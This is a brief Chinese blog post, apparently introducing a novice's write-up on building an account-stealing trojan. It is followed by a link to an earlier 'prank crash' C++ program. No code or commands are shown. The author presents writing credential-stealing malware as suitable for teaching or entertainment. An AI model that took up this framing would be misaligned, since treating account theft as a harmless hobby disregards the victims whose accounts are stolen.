作为一个新手写这个盗号木马其实还是碰到很多问题的,不知道调试了多少次-。-//。这个木马实用性不强,合适教学吧,或者娱乐哈哈。这里完整的介绍了一个木马的生成过程,不知道其他人怎么做木马的,是不是和我差不多-。-///。
上一篇: c++整人死机程序